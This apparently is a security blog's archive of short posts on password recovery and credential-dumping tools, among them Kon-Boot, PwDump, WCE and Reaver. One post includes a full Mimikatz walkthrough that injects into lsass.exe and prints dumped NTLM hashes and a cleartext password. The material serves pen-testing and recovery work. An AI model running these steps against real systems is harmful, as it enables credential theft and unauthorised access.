What’s new in version V2.1?
– Windows 8 support (only standard BIOS, no EFI support)
– Sticky keys feature (allows user to spawn a console window with system admin rights before the user is logged in)
src: http://www.thelead82.com/kon-boot/
Sometimes when you can’t enter the BIOS because there is a password, but you can still boot into windows, you can try to use CMOS De-Animator to clear the BIOS settings. Works on both 32 and 64 bit. In the event that it doesn’t work try to use our BIOS password recovery service. CMOS De-Animator can be downloaded from the author’s website ::HERE::
When you type a password into your webbrowsers, they are often hidden behind bullets or asterisks, which is fine when you know the password, but if you can’t remember and it’s being filled in automatically, you have to look in the browser options or use a 3rd party utility to reveal it. We covered a way to use it using a simple javascript back in 2008. Here’s a simple way to reveal the password using built-in functionality of the browser developer tools. We’re going to show you how to do it on Firefox 12 and Internet Explorer 9. This is also tested and working in Google Chrome 18 and Opera 11.
(more…)
Quarks PwDump is new open source tool to dump various types of Windows credentials:
It currently extracts :
The tool is currently dedicated to work live on operating systems without injecting in any process, limiting the risk of undermining their integrity or stability. it requires administrator’s privileges and is still in beta test. http://code.google.com/p/quarkspwdump/ more info http://www.quarkslab.com/en-blog+read+13
In beta testing for linux right now, only supports NTLM and MD5 right now. But you are able to bruteforce passwords from multiple sources at the same time. Download from here: https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download
The password protected PDF file is passed to the Beaglebone device on a thumb drive. Since the BeagleBone is running embedded Linux you don’t need to mess around with figuring out how to read from the device. A click of the button starts the process. Currently the code just uses a brute force attack which can test more than 6000 four-character passwords per second on the 700 MHz ARM processor. This is quite slow for any password more than four or five characters long, but [Nuno] does mention the possibility of running several ARM processors in parallel, or using a dictionary (or rainbow table) to speed things up. Either way it’s an interesting project to try on the hardware.
Src: nunoalves.com
As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French http://blog.gentilkiwi.com/mimikatz
Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)
C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;160179
Package d’authentification : NTLM
Utilisateur principal : Administrator
Domaine d’authentification : TestBox64
msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/
tspkg : waza1234/
Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.
Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)
Frequently Asked Questions (FAQ) available here.
Ryan O’Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha, check it out on IOActive’s Blog
The WiFi Protected Setup (WPS) protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours, using the open source tool called Reaver. Think your 32 character alpha-numeric password is uncrackable? If your wireless router is using WPS then your router may be spit back your password in plain-text to the attacker in less than 10 hrs. WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point’s PIN and then extract the PSK and give it to the attacker. When we tested Reaver in our labs we were able to recovery the WPA password in 1.5hrs and the longest run was 7.5hrs 
